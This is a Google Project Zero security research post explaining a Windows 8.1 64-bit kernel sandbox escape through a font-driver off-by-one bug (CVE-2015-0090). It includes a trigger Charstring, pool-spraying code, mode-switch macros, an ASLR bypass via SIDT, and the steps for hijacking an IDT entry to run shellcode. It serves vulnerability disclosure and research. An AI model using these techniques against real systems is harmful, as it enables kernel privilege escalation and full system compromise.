Friday, August 21, 2015

One font vulnerability to rule them all #4: Windows 8.1 64-bit sandbox escape exploitation

Posted by Mateusz Jurczyk of Google Project Zero

This is the fourth and final part of the “One font vulnerability to rule them all” blog post series. In the previous posts, we introduced the “blend” PostScript operator vulnerability and successfully used it to first exploit Adobe Reader, and later to escape the sandbox on 32-bit builds of Windows 8.1 by repeating the attack against the kernel with a modified ROP chain and payload.


Today, we will complete the proof of concept exploit by adding support for a sandbox escape working on 64-bit builds of Windows 8.1, and provide some closing thoughts regarding the Charstring vulnerability research, as well as font security in general.

Exploitation of Microsoft Windows 8.1 Update 1 (64-bit)

As previously mentioned, 64-bit Windows platforms were unaffected by the BLEND vulnerability, making it impossible to use it for a sandbox escape. However, in order to make our proof of concept fully universal and also demonstrate the impact of other issues discovered during the Charstring research, we can take advantage of one of them in the x64 scenario. The three other flaws in ATMFD.DLL potentially allowing arbitrary code execution are listed below:

  1. CVE-2015-0090 – a read/write-what-where condition via an uninitialized pointer from the kernel pools.
  2. CVE-2015-0091 – a controlled pool-based buffer overflow of a constant-sized allocation.
  3. CVE-2015-0092 – a ≤ 64 byte pool-based buffer underflow of an arbitrarily-sized allocation.

While pool corruption vulnerabilities are still exploitable in the Windows kernel, they are typically rather “inconvenient” for attackers to use: they require a lot of work and might be unreliable if the internal state of the pools is not sufficiently controlled. Exploitation of such bugs using universal methods (attacking pool metadata) was also made much more difficult by Microsoft, which introduced a number of pool exploit mitigations in Windows 7, 8 and 8.1. On the other hand, the CVE-2015-0090 issue seemed easier to use for two reasons: firstly, controlling uninitialized memory via pool spraying is more reliable and safer than corrupting the pools, and secondly, the resulting read/write-what-where primitive is much more powerful and convenient to use for the actual elevation of privileges. As a result, I decided to focus on this specific bug for the x64 sandbox escape part of the proof of concept exploit. The subsection below explains the root cause and other details of the vulnerability.

The Registry Object vulnerability (CVE-2015-0090)


In addition to the two standard methods of storing data available to Charstring programs (the operand stack and the transient array), the “Type 2 Charstring Format” specs from 1998 (the same revision that introduced the “blend” operator) also defined a completely new one related to the multiple masters functionality, called the “Registry Object”. While it was subsequently removed in 2000 together with all other OpenType/MM functionality, it is still supported by ATMFD.DLL.

The registry object can be referenced by two dedicated, complementary instructions called “store” and “load”, which transfer data back and forth between the transient array and the Registry. The storage was described in the specification in the following way:


The Registry provides more permanent storage for a number of items that have predefined meanings. The items stored in the Registry do not persist beyond the scope of rendering a font. Registry items are selected with an index, thus:

0 Weight Vector
1 Normalized Design Vector
2 User Design Vector
The result of selecting a Registry item with an index outside this list is undefined.

The absolute maximum number of elements for these items are:
Weight Vector 16
Normalized Design Vector 15
User Design Vector 15
The result of accessing an element of an item beyond the absolute maximum number of elements for an item is undefined. The result of accessing an element of an item beyond the actual range for a particular font is undefined.

As shown above, the document also conveniently hints where things might go wrong in the interpreter if the specified limits are not properly enforced.

Internally in ATMFD, the three registry items are implemented as an array of REGISTRY_ITEM structures (I came up with the name and reverse-engineered the format), which reside in a global font state structure used by the driver to store various information regarding the overall font object:

struct REGISTRY_ITEM {
 long size;
 void *data;
} Registry[3];

The index of the registry item (0, 1 or 2) was in fact sanitized before usage with the following snippet of code:

.text:000000000004A249                 cmp     r8d, 3
.text:000000000004A24D                 ja      loc_495FC

Can you spot the bug? The code actually verifies an “index > 3” condition and bails out if it is true, while in fact it should check for “index >= 3”. This off-by-one error makes it possible for the Charstring to reference an illegal registry item of index 3. More technically speaking, it enables us to trigger the following “memcpy” function calls with controlled data in the transient array and size of the operation, using the “store” and “load” instructions respectively:

memcpy(Registry[3].data, transient array, controlled size);
memcpy(transient array, Registry[3].data, controlled size);

provided that the signed value of the Registry[3].size field is positive.
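
The difference between the shipped check and the intended one comes down to a single comparison operator. The sketch below is only a C++ rendering of that logic, not the driver's source: the function names and the kRegistryItemCount constant are made up for illustration. Since “ja” is an unsigned comparison, the index is modeled as an unsigned 32-bit value.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical constant: the registry has three legal items (indices 0..2).
constexpr std::uint32_t kRegistryItemCount = 3;

// Mirrors "cmp r8d, 3 / ja bail_out": only indices strictly above 3 are
// rejected, so index 3 slips through.
constexpr bool IndexAcceptedByShippedCheck(std::uint32_t index) {
  return !(index > kRegistryItemCount);
}

// The intended check ("index >= 3" bails out): only 0, 1 and 2 are accepted.
constexpr bool IndexAcceptedByFixedCheck(std::uint32_t index) {
  return index < kRegistryItemCount;
}

static_assert(IndexAcceptedByShippedCheck(3), "index 3 passes the shipped check");
static_assert(!IndexAcceptedByFixedCheck(3), "index 3 fails the fixed check");
```

Both variants reject every index above 3, including negative values reinterpreted as large unsigned numbers; they differ only for the single value 3.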

As previously mentioned, the registry array is part of an overall font state structure, which means that the out-of-bounds entry at index 3 occupies the memory of whatever object is defined directly after the array. While the exact definition of the structure is unknown due to the closed source nature of the driver, we have observed that the Registry[3] structure is in fact uninitialized during the run time of the interpreter, meaning that both the “size” and “data” fields contain old bytes that were previously part of another pool allocation. Exploitation-wise, if we were able to spray the kernel pools with controlled bytes such that Registry[3].size and Registry[3].data overlapped with our previous allocation, we would end up with arbitrary read and write capabilities in the Windows kernel.

In the Charstring, the condition can be triggered with the following sequence of instructions:
/a ## -| { 3 0 0 1 store } |-

where:

  • 3 is the out-of-bounds registry index, the culprit of the bug,
  • 0 is the offset relative to the start of the registry item,
  • 0 is the offset relative to the start of the transient array,
  • 1 is the number of 32-bit words to copy,
  • store is the vulnerable instruction.
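
To make the operand order concrete, here is a toy model of how a “store” could be handled when every limit quoted from the specification is enforced. It is a sketch under stated assumptions rather than ATMFD's implementation: ToyRegistry and ToyStore are hypothetical names, elements are modeled as 32-bit integers, and the transient array is simply a vector supplied by the caller.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Toy model only: names and layout are illustrative, not the driver's.
struct ToyRegistry {
  std::vector<std::int32_t> items[3];
  ToyRegistry() {
    items[0].resize(16);  // Weight Vector: at most 16 elements
    items[1].resize(15);  // Normalized Design Vector: at most 15 elements
    items[2].resize(15);  // User Design Vector: at most 15 elements
  }
};

// Operand order follows the Charstring above: registry index, offset into the
// registry item, offset into the transient array, number of 32-bit words.
// Returns false instead of copying when any operand is out of range.
inline bool ToyStore(ToyRegistry& reg,
                     const std::vector<std::int32_t>& transient,
                     std::size_t index, std::size_t reg_offset,
                     std::size_t transient_offset, std::size_t count) {
  if (index >= 3) return false;  // rejects the index 3 used by the bug
  std::vector<std::int32_t>& item = reg.items[index];
  if (reg_offset > item.size() || count > item.size() - reg_offset)
    return false;
  if (transient_offset > transient.size() ||
      count > transient.size() - transient_offset)
    return false;
  std::copy_n(transient.begin() + static_cast<std::ptrdiff_t>(transient_offset),
              count,
              item.begin() + static_cast<std::ptrdiff_t>(reg_offset));
  return true;
}
```

In this model, the operands “3 0 0 1” from the Charstring above are refused at the first check, while “0 0 0 1” copies one word into the Weight Vector.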

Kernel pool spraying in Windows for the purpose of exploiting use-after-free or use of uninitialized memory conditions is an easy task, even in the latest editions of the operating system. Tarjei Mandt performed some extensive research in this area in the context of Windows 7 [1], devising methods for controlling the state of various pool types. For “Session Paged Pools”, which is where the font object structure is allocated from, he proposed the usage of the SetClassLongPtr USER function to set the Unicode name of a menu object, resulting in a kernel allocation of an arbitrary size and content:

SetClassLongPtrW(hwnd, GCLP_MENUNAME, (LONG)lpBuffer);

As it turns out, the technique still works just fine in Windows 8.1 – we only have to determine the right sequence of allocations to make sure that one of them will be reused by ATMFD for the font object structure. Practical experiments have shown that triggering allocations of an increasing size between 1000 and 4000 bytes, repeated 100 times, reliably fills the uninitialized REGISTRY_ITEM structure in all tested environments:

for (UINT i = 0; i < 100; i++) {
 for (UINT j = 500; j < 2000; j++) {
   SpraySessionPoolMemory(hwnd,
                          j * 2,
                          0x0101010101010101LL,
                          0xFFFFFFFFDEADBEEFLL);
 }
}
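
As a quick sanity check of the loop bounds, the sketch below walks the same two loops and only records the sizes they would request; it performs no allocations. It assumes that the second argument of SpraySessionPoolMemory (a helper whose body is not shown here) is the allocation size in bytes. SprayPlan and SummarizeSprayLoop are illustrative names.

```cpp
#include <cassert>
#include <cstdint>

// Summary of what the nested loops above would request.
struct SprayPlan {
  std::uint32_t min_size;
  std::uint32_t max_size;
  std::uint64_t total_requests;
};

// Replays the loop bounds from the snippet above without touching the system.
inline SprayPlan SummarizeSprayLoop() {
  SprayPlan plan = {0xFFFFFFFFu, 0u, 0u};
  for (std::uint32_t i = 0; i < 100; i++) {
    for (std::uint32_t j = 500; j < 2000; j++) {
      const std::uint32_t size = j * 2;  // assumed to be a byte count
      if (size < plan.min_size) plan.min_size = size;
      if (size > plan.max_size) plan.max_size = size;
      plan.total_requests++;
    }
  }
  return plan;
}
```

Under that assumption the sizes run from 1000 to 3998 bytes in steps of two, for 150,000 requests in total.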

While we believe the algorithm shown above reliably causes Registry[3].size to reuse the value 0x0101010101010101 and Registry[3].data to reuse the value 0xFFFFFFFFDEADBEEF, if that happens not to be the case for whatever reason, the font loading will still fail cleanly if the incidental value of “size” is not positive (a condition checked by ATMFD before copying any memory), or if the value of “data” is a user-mode address (due to the aggressive exception handling used by the driver, as discussed in the previous section). An actual bugcheck can only occur upon access to invalid kernel-mode memory. This behavior makes it potentially possible to retry the exploitation multiple times; however, that shouldn’t really be necessary considering the high degree of reliability provided by the pool spraying procedure.

Once the spraying completes and a font containing the above Charstring program triggering the vulnerability is loaded, we can observe the following system bugcheck, illustrating that the kernel indeed tried to write data to the address we have used in the pool spraying phase:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffffdeadbef2, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000adcc6a, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 0000000000000002, (reserved)

With the read/write-what-where condition at our disposal, we now have to decide what we are going to read or write, keeping in mind our goal of subverting all existing exploit mitigations available on the attacked Windows 8.1 platform. The question is not exactly trivial to answer, as Microsoft has gone to great lengths to disable all sources of kernel address space information available to Low Integrity processes in Windows 8 and 8.1 – and we don’t really want to use yet another bug to get the necessary information leak.

Fortunately, there are still some sources of kernel address space information that Windows doesn’t block, such as information provided directly by the CPU which cannot easily be faked or protected without special capabilities (e.g. hypervisor mode). Two such sources of information are the “SIDT” and “SGDT” instructions, which return the addresses and lengths of the special “Interrupt Descriptor Table” and “Global Descriptor Table” processor structures residing in kernel memory. These instructions are available in both user and kernel mode by default and cannot be disabled or restricted (even from ring-0), thus providing a very convenient anti-ASLR primitive.

As the two structures are initialized at a very early stage of the system start up for CPU #0, we can expect them to have a rather “regular” form and/or be located at predictable locations relative to each other. As shown in Figure 1, this is indeed the case – the GDT structure of size 0x80 is directly followed by IDT of size 0x1000 (256 entries, each 16 bytes long), and since they occupy 0x1080 bytes in total, the subsequent 0xF80 bytes before the page boundary are unused.


Figure 1. The relative placement of GDT and IDT structures for CPU #0 on Windows 8.1 64-bit.
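
The arithmetic behind this layout can be written down as a handful of compile-time constants. This is just a worked example of the numbers quoted above; the constant and function names are ours, and the 4 KiB page size is the standard x86-64 small page size.

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint64_t kPageSize = 0x1000;    // 4 KiB pages
constexpr std::uint64_t kGdtSize = 0x80;       // GDT size observed for CPU #0
constexpr std::uint64_t kIdtEntries = 256;     // one gate per interrupt vector
constexpr std::uint64_t kIdtEntrySize = 16;    // 64-bit gate descriptors
constexpr std::uint64_t kIdtSize = kIdtEntries * kIdtEntrySize;

// Bytes occupied by both tables, rounded up to the next page boundary.
constexpr std::uint64_t kUsedBytes = kGdtSize + kIdtSize;
constexpr std::uint64_t kSpanBytes =
    (kUsedBytes + kPageSize - 1) / kPageSize * kPageSize;
constexpr std::uint64_t kUnusedBytes = kSpanBytes - kUsedBytes;

// With the GDT placed directly before the IDT, its base follows from the
// IDT base returned by SIDT.
constexpr std::uint64_t GdtBaseFromIdtBase(std::uint64_t idt_base) {
  return idt_base - kGdtSize;
}

static_assert(kIdtSize == 0x1000, "256 entries of 16 bytes");
static_assert(kUsedBytes == 0x1080, "GDT plus IDT");
static_assert(kUnusedBytes == 0xF80, "slack before the page boundary");
```

For an IDT base ending in 0x080, as in the WinDbg listings in this post, the computed GDT base is page-aligned, which matches the figure.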

There are several reasons why the structures can be especially useful from the exploitation angle. For one, IDT is full of function pointers by design:

0: kd> !idt
Dumping IDT: fffff801d6acf080
00:  fffff801d5167900 nt!KiDivideErrorFault
01:  fffff801d5167a00 nt!KiDebugTrapOrFault
02:  fffff801d5167bc0 nt!KiNmiInterrupt
03:  fffff801d5167f40 nt!KiBreakpointTrap
04:  fffff801d5168040 nt!KiOverflowTrap
05:  fffff801d5168140 nt!KiBoundFault
[…]

Some of the interrupts are user-facing, i.e. they can be invoked from user-mode. These include low IDT entries being standard CPU exception handlers (not especially safe to tamper with, as other processes or the kernel might also trigger them unexpectedly), but also a handful of entries designed to be used specifically from ring-3, such as nt!KiRaiseSecurityCheckFailure (IDT 0x29), nt!KiRaiseAssertion (IDT 0x2C) or nt!KiDebugServiceTrap (IDT 0x2D). Another potential issue might be the fact that function pointers are partitioned across the IDT entry, interlaced by other flags and values, as shown in Figure 2.

Figure 2. 64-bit IDT entry descriptors
(source: Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3A: System Programming Guide, Part 1)

The pointer partitioning should not be much of a problem though, as it could probably be handled by a few arithmetic instructions in the Charstring program. Better yet, we could also just find a “trampoline” gadget of the form “JMP REG” in the direct vicinity (same memory page) of the overwritten handler, which should then only require modifying the low 16 bits of the address and also be fully reliable against ASLR.
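
The partitioning is easier to see in code. The structure below follows the 64-bit gate descriptor layout from the Intel manual (offset bits 15..0, selector, IST, type/attributes, offset bits 31..16, offset bits 63..32, reserved); the type and function names are our own, and the helpers operate on an ordinary in-memory copy of an entry. It is a sketch of the bit manipulation only.

```cpp
#include <cassert>
#include <cstdint>

// One 16-byte IDT entry in 64-bit mode. Field names are illustrative.
struct IdtGate64 {
  std::uint16_t offset_low;   // handler address bits 15..0
  std::uint16_t selector;     // code segment selector
  std::uint8_t ist;           // interrupt stack table index (low 3 bits)
  std::uint8_t type_attr;     // gate type, DPL, present bit
  std::uint16_t offset_mid;   // handler address bits 31..16
  std::uint32_t offset_high;  // handler address bits 63..32
  std::uint32_t reserved;
};
static_assert(sizeof(IdtGate64) == 16, "gate descriptors are 16 bytes long");

// Reassembles the three address fragments into a full 64-bit pointer.
inline std::uint64_t HandlerAddress(const IdtGate64& gate) {
  return static_cast<std::uint64_t>(gate.offset_low) |
         (static_cast<std::uint64_t>(gate.offset_mid) << 16) |
         (static_cast<std::uint64_t>(gate.offset_high) << 32);
}

// Splits a 64-bit pointer into the three fragments.
inline void SetHandlerAddress(IdtGate64& gate, std::uint64_t address) {
  gate.offset_low = static_cast<std::uint16_t>(address & 0xFFFF);
  gate.offset_mid = static_cast<std::uint16_t>((address >> 16) & 0xFFFF);
  gate.offset_high = static_cast<std::uint32_t>(address >> 32);
}

// Points the gate at another offset inside the same 4 KiB page. Only the
// low 12 bits change, and they all live in offset_low.
inline bool RetargetWithinPage(IdtGate64& gate, std::uint16_t page_offset) {
  if (page_offset >= 0x1000) return false;
  gate.offset_low =
      static_cast<std::uint16_t>((gate.offset_low & 0xF000) | page_offset);
  return true;
}
```

Because a same-page target shares the upper 52 bits with the original handler, offset_mid and offset_high never need to be known or touched, which is why the approach is independent of ASLR.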

The other extremely interesting and useful fact about the GDT/IDT memory area is its access rights, which are set to Read/Write/Execute, as shown below in a WinDbg listing:

0: kd> !pte idtr
VA fffff801d6acf080
[...] PTE at FFFFF6FC00EB5678
[...] contains 00000000048CF163
[...] pfn 48cf   -G-DA--KWEV

As a result, we can freely store our payload in the 0xF80 unused bytes following IDT, and execute it from there! Now, all the pieces start to come together. :-)

As we are attacking a 64-bit kernel, the IDT address is likewise 64-bit. However, the 2nd stage DLL obviously runs in the 32-bit Compatibility Mode, and thus the SIDT instruction executed in such context would only provide us with 32 bits of the desired address. In order to get it in full, we must temporarily transfer to Long Mode, execute the one necessary instruction and immediately return to Compatibility Mode. Both transfers are very simple to achieve, as they only take a single far call to code segment (cs: register) 0x33 for the 64-bit mode, and code segment 0x23 for the 32-bit mode.

The following helper C++ macros for Visual Studio were developed by ReWolf to facilitate the task [2]:

#define EM(a) __asm __emit (a)
#define X64_Start_with_CS(_cs) { \
EM(0x6A) EM(_cs)                 /*  push   _cs                  */ \
EM(0xE8) EM(0) EM(0) EM(0) EM(0) /*  call   $+5                  */ \
EM(0x83) EM(4) EM(0x24) EM(5)    /*  add    dword [esp], 5       */ \
EM(0xCB)                         /*  retf                        */ \
}
#define X64_End_with_CS(_cs) { \
EM(0xE8) EM(0) EM(0) EM(0) EM(0) /*  call   $+5                  */ \
EM(0xC7) EM(0x44) EM(0x24) EM(4) /*                              */ \
EM(_cs) EM(0) EM(0) EM(0)        /*  mov    dword [rsp + 4], _cs */ \
EM(0x83) EM(4) EM(0x24) EM(0xD)  /*  add    dword [rsp], 0xD     */ \
EM(0xCB)                         /*  retf                        */ \
}
#define X64_Start() X64_Start_with_CS(0x33)
#define X64_End() X64_End_with_CS(0x23)

By making use of them, we can now obtain the full address of IDT using the following short C++ function:

ULONGLONG sidt() {
#pragma pack(push, 1)
 struct {
   USHORT limit;
   ULONGLONG address;
 } idtr;
#pragma pack(pop)
 X64_Start();
 __sidt(&idtr);
 X64_End();
 return idtr.address;
}
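
The “#pragma pack” directive matters here because, in 64-bit mode, SIDT writes a 10-byte image: a 2-byte limit immediately followed by an 8-byte base. Without packing, the compiler would place the 64-bit field at offset 8 instead of offset 2. The sketch below decodes such an image from a plain byte array so that the layout can be checked without executing the instruction; Idtr64, DecodeIdtr and EntryCount are illustrative names.

```cpp
#include <cassert>
#include <cstdint>

// Decoded form of the 10-byte IDTR image (no packing needed here because the
// fields are filled in one by one rather than overlaid on the raw bytes).
struct Idtr64 {
  std::uint16_t limit;  // size of the table in bytes, minus one
  std::uint64_t base;   // linear address of the first entry
};

// Decodes the little-endian image: bytes 0..1 hold the limit and bytes 2..9
// hold the base address.
inline Idtr64 DecodeIdtr(const unsigned char (&raw)[10]) {
  Idtr64 out = {0, 0};
  out.limit = static_cast<std::uint16_t>(raw[0] | (raw[1] << 8));
  for (int i = 7; i >= 0; --i) {
    out.base = (out.base << 8) | raw[2 + i];
  }
  return out;
}

// Number of 16-byte gate descriptors covered by the limit.
inline unsigned EntryCount(const Idtr64& idtr) {
  return (idtr.limit + 1u) / 16u;
}
```

A limit of 0xFFF corresponds to the 0x1000-byte, 256-entry table described earlier.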

With this, we now have all the pieces of the puzzle in place, and can implement the final exploit by performing the following steps in the 2nd stage DLL:

  1. Make sure that the thread is running on CPU #0 using the SetThreadAffinityMask API.
  2. Spray the Session Paged Pool with Registry[3].size set to 0x0101..., and Registry[3].data set to the IDT address.
  3. Load the kernel exploit font.

The rest of the exploitation process takes place inside of the Charstring program in the font, which performs the following actions:

  1. Copy the entire IDT to the transient array.
  2. Adjust entry 0x29 (nt!KiRaiseSecurityCheckFailure) to an address of a “JMP R11” gadget residing in the same memory page, and write it back to IDT.
  3. Save the original value of the modified part of IDT[0x29] at IDT+0x1100 in order to restore it later on.
  4. Write the kernel-mode elevation of privileges shellcode at IDT+0x1104.

The “KiRaiseSecurityCheckFailure” interrupt was chosen for the irony of it – here, we’re using a mechanism designed to mitigate vulnerability exploitation to compromise the operating system. :-) The steps taken by the font are illustrated in the following animation:

Once the Charstring program execution completes, our environment is fully set up – the only remaining steps are to trigger the execution of the kernel-mode shellcode installed in memory past the IDT and finish the job:

  1. Switch to Long Mode and trigger Interrupt 0x29 with the R11 register set to IDT+0x1104 (the shellcode address).
    1. The shellcode restores the original IDT[0x29] entry, elevates all “AcroRd32.exe” process privileges and increases the active process limit using the algorithm described in the 32-bit kernel exploitation section.
  2. Unhook the KERNELBASE!CreateProcessA function.
  3. Spawn calc.exe.

A working exploit successfully escaping the Adobe Reader sandbox via the CVE-2015-0090 vulnerability is presented in the video below:



Final thoughts

Mission accomplished! We have successfully created a single, 100% reliable PDF file launching an elevated calc.exe upon opening with Adobe Reader 11.0.10 on Windows 8.1 Update 1 x86 and x64. To sum up, we have managed to bypass the following exploit mitigations along the way:

  • Stack cookies – thanks to the arbitrary, non-contiguous stack read/write primitive provided by the BLEND vulnerability, we have never touched any stack cookies during the exploitation process.
  • ASLR – the exploit is based solely on addresses calculated off data reliably leaked or requested from the CPU.
  • DEP – all stages ran in executable memory (through ROP or otherwise).
  • Sandboxing – escaped by using the same (x86) or related (x64) vulnerability.
  • SMEP – kernel-mode payload executed in the kernel address space.

We have also maintained complete reliability along the process, as no brute-forcing or guessing was involved; instead, all stages were fully deterministic (with the small exception of kernel pool spraying in the x64 sandbox escape, which we still consider extremely reliable).

Performing the Charstring security research was an interesting exercise, as it distinctly showed that despite the seemingly large amount of attention from the security community, font vulnerabilities are still not extinct, but rather quite the opposite (the latest example being yet another ATMFD vulnerability discovered in the Hacking Team leaked data dump). Considering the extent of font format functionality and complexity (which are still being extended in order to accommodate modern users’ needs), we find it likely that fonts will be an attractive target for the foreseeable future. The impact of font vulnerabilities could still be greatly reduced in many areas, for example by removing font processing from all privileged security contexts (such as the operating system kernel). We applaud Microsoft for introducing a number of font-related mitigations in the upcoming Windows 10, such as the usage of low integrity userland font drivers.

The research also shows that certain portions of native code can still be shared between various high-profile software today, even between client applications and operating systems. Such situations may have a number of negative consequences for software security, the worst of which is the scenario discussed in this post – a single vulnerability affecting a number of targets, enabling adversaries to attack many of them simultaneously or chain exploits to compromise machines with just one bug. While this is definitely not a common situation, sometimes it is worthwhile to study the history of software and file format development, as it may uncover interesting or surprising connections between pieces of software we run on our computers today, or indicate the most promising areas for research (e.g. obsolete, deprecated or forgotten file format features implemented decades ago).

Lastly, the BLEND vulnerability demonstrates that even in 2015, the era of high-quality mitigations and security mechanisms, one good bug providing the right set of primitives can still suffice to fully compromise a system.

I hope you enjoyed the series, and stay tuned for more font-related blog posts soon! :-)

References

